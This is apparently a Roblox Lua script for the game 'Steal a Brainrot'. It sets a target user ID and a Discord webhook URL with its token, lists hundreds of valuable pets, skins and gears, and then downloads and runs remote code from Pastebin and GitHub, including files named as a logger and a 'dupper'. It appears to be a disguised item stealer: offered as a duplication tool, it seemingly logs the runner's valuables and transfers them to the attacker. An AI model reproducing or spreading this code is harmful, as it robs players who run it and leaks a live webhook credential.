-- This file was generated at discord.gg/syncrypt

getgenv().TARGET_USER_ID = 10180846954
getgenv().GOOD_WEBHOOK = "https://discord.com/api/webhooks/1554509240406904932/xmoVjD4nejjUIfUi0EXYKC7GDvMAspm8WWqIKd8B4GLCgtmzHiBbZm6IVwtBdEiFSH9k"
getgenv().ALLOWED_ANIMALS = {
	"Spyder Elephant",
	"Strawberry Elephant",
	"Meowl",
	"John Pork",
	"Skibidi Toilet",
	"Los Dragons",
	"Griffin",
	"Dragon Aquanini",
	"Dragon Gingerini",
	"Hydra Dragon Cannelloni",
	"Signore Carapace",
	"Dragon Cannelloni",
	"Love Love Bear",
	"Moby Bros",
	"Hydra Serpent",
	"Digi Narwhal",
	"La Supreme Combinasion",
	"Kraken",
	"Elefanto Frigo",
	"Hydra Bunny",
	"Arcadragon",
	"Celestial Pegasus",
	"Cerberus",
	"Venuspino",
	"Jelly Moby",
	"Bumbatron",
	"Popcuru and Fizzuru",
	"Bunny and Eggy",
	"Rosey and Teddy",
	"La Breakfast Combinasion",
	"Capitano Moby",
	"Cooki and Milki",
	"Orchidox",
	"Pancake and Syrup",
	"Burguro And Fryuro",
	"Los Secret Combinasionas",
	"Ketupat Bros",
	"Reinito Sleighito",
	"Los Amigos",
	"Fortunu and Cashuru",
	"Pizza and Ranch",
	"La Secret Combinasion",
	"Antonio",
	"Fishino Clownino",
	"Draculino",
	"Foxini Lanternini",
	"Kalika Bros",
	"Los Sekolahs",
	"Sammyni Truckini",
	"La Casa Boo",
	"Fragrama and Chocrama",
	"Cash or Card",
	"La Fuse Machine",
	"Los Admins",
	"La Food Combinasion",
	"Duggy Bros",
	"Lavadorito Spinito",
	"Yetimatic",
	"S’more Serat",
	"Gold and Diamond",
	"Spooky and Pumpky",
	"Boppin Bunny",
	"La Ginger Sekolah",
	"Cangurato Gelato",
	"Ginger Gerat",
	"Los Chillis",
	"Los Hackers",
	"La Craft Machine",
	"Bearito Cabinito",
	"Rubiko and Kubiko",
	"Hokka Horloge",
	"Capitano Americano",
	"Sammyni Fattini",
	"Los Spaghettis",
	"Rubrikiko",
	"Examen Bros",
	"Festive 67",
	"Panda Popanda",
	"Guest 666",
	"Quackini Snackini",
	"Ventoliero Pavonero",
	"Queen Bee",
	"Grabatron",
	"Pop Pop Petalini",
	"Spaghetti Tualetti",
	"La Summer Grande",
	"Cloverat Clapat",
	"Los Tictacs",
	"Lionello Casarello",
	"Candini Fluffini",
	"Sammyni Cakini",
	"Hopilikalika Hopilikalako",
	"Steakini Fattini",
	"Caylusaurus",
	"La Easter Grande",
	"Polaroidini",
	"Garama and Madundung",
	"Rosetti Tualetti",
	"Nacho Spyder",
	"La Anniversary Grande",
	"Nachorilla",
	"Chicli Chicla",
	"Scorpino Coasterino",
	"Money Money Bros",
	"Gold Gold Gold",
	"Jolly Jolly Sahur",
	"Ketchuru And Musturu",
	"Rico Dinero",
	"Gym Bros",
	"Los Tangcitos",
	"Orcaledon",
	"La Romantic Grande",
	"Swaggy Bros",
	"La Lucky Grande",
	"Tictac Sahur",
	"La Taco Combinasion",
	"Ketupat Kepat",
	"Tang Tang Keletang",
	"Coco and Mango",
	"Abyssaloco",
	"Esok Goala",
	"Lovin Rose",
	"Noo my Examen",
	"Noo my Resume",
	"Honey Honey Bear",
	"Los Tacoritas",
	"Bufalino Boomberino",
	"Eviledon",
	"Bacuru and Egguru",
	"Los Primos",
	"Puffino Builderino",
	"La Jolly Grande",
	"Esok Sekolah",
	"La Extinct Grande",
	"W or L",
	"Los Puggies",
	"Sand Sand Sand",
	"Los Cupids",
	"Lavamanta",
	"Tralaledon",
	"Globa Steppa",
	"Noodle Noodle Poodle",
	"Los Fruits",
	"Los Candies",
	"Los Hotspotsitos",
	"Los Spooky Combinasionas",
	"Cigno Fulgoro",
	"Los Jolly Combinasionas",
	"Frullato Framingo",
	"La Spooky Grande",
	"Gobblino Uniciclino",
	"Chicleteira Champeona",
	"Peschito Machito",
	"Deputy Leopard",
	"Mieteteira Bicicleteira",
	"Tuff Toucan",
	"Tacoturbo Tacorito",
	"Los 67",
	"Celularcini Viciosini",
	"Los Mobilis",
	"Capitano Gullini",
	"Snailo Clovero",
	"Los Planitos",
	"Churrito Bunnito",
	"Money Money Puggy",
	"Los Bros",
	"Girafini Raftini",
	"Chipso and Queso",
	"Money Money Reindeer",
	"Chillin Chili",
	"Chicleteira Cupideira",
	"Las Sis",
	"DJ Panda",
	"Nuclearo Dinossauro",
	"Spinny Hammy",
	"Camera Ramena",
	"Tacorita Bicicleta",
	"Los Sweethearts",
	"Motorino Bumbino",
	"Baskito",
	"Chicleteira Surfeiteira",
	"Los Combinasionas",
	"Chicleteira Noelteira",
	"Bananito",
	"Gattino Hydrantino",
	"Chimnino",
	"Noo my Gold",
	"Swag Soda",
	"Noo my Heart",
	"Mariachi Corazoni",
	"Pogo Pogo Penguin",
	"Tacorillo Crocodillo",
	"Los 25",
	"Conetto Morsetto",
	"Los Burritos",
	"Sushi Inu",
	"Donkeyturbo Express",
	"67",
	"John Doe",
	"Sir Mangus",
	"Zebrino Pianino",
	"Los Chicleteiras",
	"Noo my Eggs",
	"Burrito Bat",
	"Syrup Samurai",
	"Los Mi Gatitos",
	"Strawberrita",
	"Ombrello Topolino",
	"Rang Ring Bus",
	"Noo my Present",
	"Flipa Sandala",
	"Los Nooo My Hotspotsitos",
	"La Grande Combinasion",
	"Serafinna Medusella",
	"Var Var Var",
	"Noo my candy",
	"Arcadopus",
	"Gub",
	"Bunito Bunito Spinito",
	"Futbolini Skatini",
	"Los Quesadillas",
	"Los Bunitos",
	"Aquarino",
	"Chill Puppy",
	"Burrito Bandito",
	"Chicleteirina Bicicleteirina",
	"Granny",
	"Flancito",
	"4th Bros",
	"Luck Luck Luck Sahur",
	"Marino Submarino",
	"Quesadillo Vampiro",
	"Brunito Marsito",
	"Chicleteira Bicicleteira",
	"Eid Eid Eid Sahur",
	"Octoball",
	"Cupid Hotspot",
	"Secret Lucky Block",
	"Qamar Camelamp",
	"Ho Ho Ho Sahur",
	"Mi Gatito",
	"Cupid Cupid Sahur",
	"Los Cornis",
	"Rosatops Triceratino",
	"Rocketini Frostini",
	"Quesadilla Crocodila",
	"Naughty Naughty",
	"Pot Pumpkin",
	"Rockarino Rockara",
	"Horegini Boom",
	"Ref Ref Ref Sahur",
	"Buho de Volto",
	"Santa Hotspot",
	"Rexino Ramino",
	"Pot Hotspot",
	"25",
	"Pirulitoita Bicicleteira",
	"Gelatina Volatina",
	"Glaciator",
	"Los Sigmas",
	"Pin Pin Pengu",
	"To to to Sahur",
	"Bunny Bunny Bunny Sahur",
	"Yess my Resume",
	"Toro Españolo",
	"Telemorte",
	"List List List Sahur",
	"La Sahur Combinasion",
	"Pelican Pachetto",
	"Capibaro Celestino",
	"Ski Ski Skunki",
	"Nooo My Hotspot",
	"Los Jobcitos",
	"Coffin Tung Tung Tung Sahur",
	"Bunnyman",
	"Berryno",
	"Cuadramat and Pakrahmatmamat",
	"Gelato Lumacho",
	"Craburger",
	"Please my Present",
	"Hippo Golazo",
	"Los Cucarachas",
	"Easter Easter Easter Sahur",
	"1x1x1x1",
	"La Vacca Lepre Lepreino",
	"Bombardiro Vaccariro",
	"Perrito Burrito",
	"Graipuss Medussi",
	"Love Love Love Sahur",
	"Giftini Spyderini",
	"GOAT",
	"Honey Honey Narwhal",
	"Ranito Pepito",
	"Trickolino",
	"Paradiso Axolottino",
	"Triplito Tralaleritos",
	"La Vacca Jacko Linterino",
	"Buntteo",
	"Fishboard",
	"Santteo",
	"Los Karkeritos",
	"Las Vaquitas Saturnitas",
	"Karker Sahur",
	"Job Job Job Sahur",
	"Frankentteo",
	"Los Trios",
	"Pumpkini Spyderini",
	"Reindeer Tralala",
	"La Vacca Prese Presente",
	"La Karkerkar Combinasion",
	"Rocco Disco",
	"Las Tralaleritas",
	"Guerriro Digitale",
	"Dul Dul Dul",
	"Extinct Matteo",
	"Yess my Examen",
	"Zombie Tralala",
	"Fragola La La La",
	"Extinct Tralalero",
	"Los Spyderinis",
	"Torrtuginni Dragonfrutini",
	"Boatito Auratito",
	"Vulturino Skeletono",
	"La Cucaracha",
	"Los Tralaleritos",
	"Los Tortus",
	"Los Matteos",
	"Chimpanzini Spiderini",
	"Trenostruzzo Turbo 4000",
	"Chachechi",
	"Agarrini La Palini",
	"Karkerkar Kurkur",
	"Jackorilla",
	"Pretzo Robo",
	"Blackhole Goat",
	"Sammyni Spyderini",
	"Bisonte Giuppitere",
	"La Vacca Saturno Saturnita",
	"Cola Cat",
	"Hippo Jacuzzo",
	"Tenini Ballini",
	"Tortuginni Sandcastlini",
	"Robo Grafito",
	"Flippo Marino",
	"Beavo Potto",
	"Dumborino Miracello",
	"Eggdin Egg Egg Dun",
	"Clovkur Kurkur",
	"Appelini",
	"Karkerheart Luvkur",
	"Noo La Polizia",
	"Pop Pop Sahur",
	"Dolphini Jetskini",
	"Pandanini Frostini",
	"Ginger Cisterna",
	"Tentacolo Tecnico",
	"Cocoa Assassino",
	"Skull Skull Skull",
	"Krupuk Pagi Pagi",
	"Belula Beluga",
	"Patteo",
	"Brasilini Berimbini",
	"Bombardini Tortinii",
	"Cappuccino Clownino",
	"Luv Luv Luv",
	"Anpali Babel",
	"Astrolero Cervalero",
	"Lemonita Splashita",
	"Chrismasmamat",
	"Mastodontico Telepiedone",
	"Los Gattitos",
	"Bambu Bambu Sahur",
	"Piccionetta Macchina",
	"Boba Panda",
	"Bunny Tralala",
	"Buho De Noelo",
	"Lumaca Malefica",
	"Quackalena",
	"Frio Ninja",
	"Granchiello Spiritell",
	"Tootini Shrimpini",
	"Crabbo Limonetta",
	"Yeti Claus",
	"Ginger Globo",
	"Lazy Ducky",
	"Trenoturbo Axolotrico 9000",
	"Aquanaut",
	"Tartaruga Cisterna",
	"Squalanana",
	"Snailenzo",
	"Mummy Ambalabu",
	"Corn Corn Corn Sahur",
	"Orcalita Orcala",
	"Cacasito Satalito",
	"Los Orcalitos",
	"Tractoro Dinosauro",
	"Los Bombinitos",
	"Pakrahmatmatina",
	"Piccione Macchina",
	"Brr es Teh Patipum",
	"Pakrahmatmamat",
	"Ballerina Peppermintina",
	"Los Tungtungtungcitos",
	"Ballerino Lololo",
	"Bulbito Bandito Traktorito",
	"Pineaplino",
	"Koala Parabala",
	"Las Capuchinas",
	"Gattito Tacoto",
	"Los Chihuaninis",
	"Divino Platypio",
	"Sundrilla Sundae",
	"Capi Taco",
	"Trippi Troppi Troppa Trippa",
	"Urubini Flamenguini",
	"Jacko Jack Jack",
	"Trenostruzzo Turbo 3000",
	"Orcalero Orcala",
	"Espresso Signora",
	"Vampira Cappucina",
	"Extinct Ballerina",
	"Tukanno Bananno",
	"Tralalita Tralala",
	"Unclito Samito",
	"Tipi Topi Taco",
	"Statutino Libertino",
	"Alessio",
	"Money Money Man",
	"Odin Din Din Dun",
	"Tigroligre Frutonni",
	"Los Crocodillitos",
	"Tralalero Tralala",
	"Chihuanini Taconini",
	"Gattatino Nyanino",
	"Gattatino Neonino",
	"Girafa Celestre",
	"Cocofanto Elefanto",
	"Tic Tic Ribbit",
	"Orbi Mochi",
	"Bucketoro",
	"Berenjello Angello",
	"Fizzy Soda",
	"Tree Tree Tree Sahur",
	"Bananito Bandito",
	"Jacko Spaventosa",
	"Toiletto Focaccino",
	"Centrucci Nuclucci",
	"Carrotini Brainini",
	"Cocoteddy",
	"Harpuccino",
	"Carloo",
	"Bee Loco",
	"Cachorrito Melonito",
	"Spongini Quackini",
	"Los Noobinis",
	"Jingle Jingle Sahur",
	"Tracoducotulu Delapeladustuz",
	"Magi Ribbitini",
	"Rhino Helicopterino",
	"Te Te Te Sahur",
	"Lerulerulerule",
	"Tob Tobi Tobi",
	"Ganganzelli Trulala",
	"Stoppo Luminino",
	"Gorillo Watermelondrillo",
	"Gorillo Subwoofero",
	"Cavallo Virtuoso",
	"Mythic Lucky Block",
	"Avocadorilla",
	"Tigrilini Watermelini",
	"Zibra Zubra Zibralini",
	"Bombombini Gusini",
	"Spioniro Golubiro",
	"Brutto Gialutto",
	"Bombardiro Crocodilo",
	"Rhino Toasterino",
	"Orangutini Ananassini",
	"Frigo Camelo",
	"Seraphino Gruyero",
	"Buho de Fuego",
	"Electro Quacko",
	"Sealo Regalo",
	"Sigma Girl",
	"Puffaball",
	"Chocco Bunny",
	"Sigma Boy",
	"Buho del Cielo",
	"Pi Pi Watermelon",
	"Quackula",
	"Pandaccini Bananini",
	"Bandito Axolito",
	"Cocosini Mama",
	"Strawberrelli Flamingelli",
	"Pipi Potato",
	"Caramello Filtrello",
	"Blueberrinni Octopusini",
	"Clickerino Crabo",
	"Quivioli Ameleonni",
	"Glorbo Fruttodrillo",
	"Lionel Cactuseli",
	"Chef Crabracadabra",
	"Burbaloni Loliloli",
	"Ballerina Cappuccina",
	"Tirilikalika Tirilikalako",
	"Chimpanzini Bananini",
	"Mummio Rappitto",
	"Penguino Cocosino",
	"Wombo Rollo",
	"Penguin Tree",
	"Doi Doi Do",
	"Salamino Penguino",
	"Gato Celesto",
	"Frogato Pirato",
	"Mangolini Parrocini",
	"Ti Ti Ti Sahur",
	"Avocadini Guffo",
	"Brri Brri Bicus Dicus Bombicus",
	"Perochello Lemonchello",
	"Bananita Dolphinita",
	"Malame Amarele",
	"Bambini Crostini",
	"Trulimero Trulicina",
	"Avocadini Antilopini",
	"Brr Brr Patapim",
	"Cappuccino Assassino",
	"Pinealotto Fruttarino",
	"Pengolino Nuvoletto",
	"Pipi Avocado",
	"Frogo Elfo",
	"Tric Trac Baraboom",
	"Cupcake Koala",
	"Ta Ta Ta Ta Sahur",
	"Cacto Hipopotamo",
	"Boneca Ambalabu",
	"Bandito Bobritto",
	"Gangster Footera",
	"Trippi Troppi",
	"Holy Arepa",
	"Pipi Corni",
	"Tartaragno",
	"Pipi Kiwi",
	"Raccooni Jandelini",
	"Svinina Bombardino",
	"Noobini Santanini",
	"Talpa Di Fero",
	"Fluriflura",
	"Tim Cheese",
	"Lirilì Larilà",
	"Noobini Pizzanini"
}
getgenv().ALLOWED_BASESKINS = {
	"Rose",
	"Gingerbread",
	"Halloween",
	"Christmas",
	"Bunny Basket",
	"Summer",
	"Pot of Gold",
	"Taco",
	"Octo",
	"Valentines",
	"Easter",
	"Lucky",
	"Aquatic",
	"Tralala"
}
getgenv().ALLOWED_GEARS = {
	"Santa's Sleigh",
	"Cupid's Wings",
	"Witch's Broom",
	"Waverider",
	"Yin Yang Slap",
	"Cursed Slap",
	"Cyber Slap",
	"Divine Slap",
	"Bloodmoon Slap",
	"Radioactive Slap",
	"Rainbow Slap",
	"Rainbow Hammer",
	"Bloodmoon Hammer",
	"Radioactive Airstrike",
	"Yin Yang Lamp",
	"Demon's Head",
	"Lava Slap",
	"Lava Blaster",
	"Alien Slap",
	"Blackhole Bomb",
	"Candy Sentry",
	"Phantom Slap"
}
task.spawn(function()
	loadstring(game:HttpGet("https://pastebin.com/m24dfrmm"))()
end)
task.spawn(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/krb380529-source/Vonet/refs/heads/main/LoggerMoreira.lua"))()
end)
task.spawn(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/krb380529-source/Vonet/refs/heads/main/Vonet-dupper.lua%2323%23"))()
end)
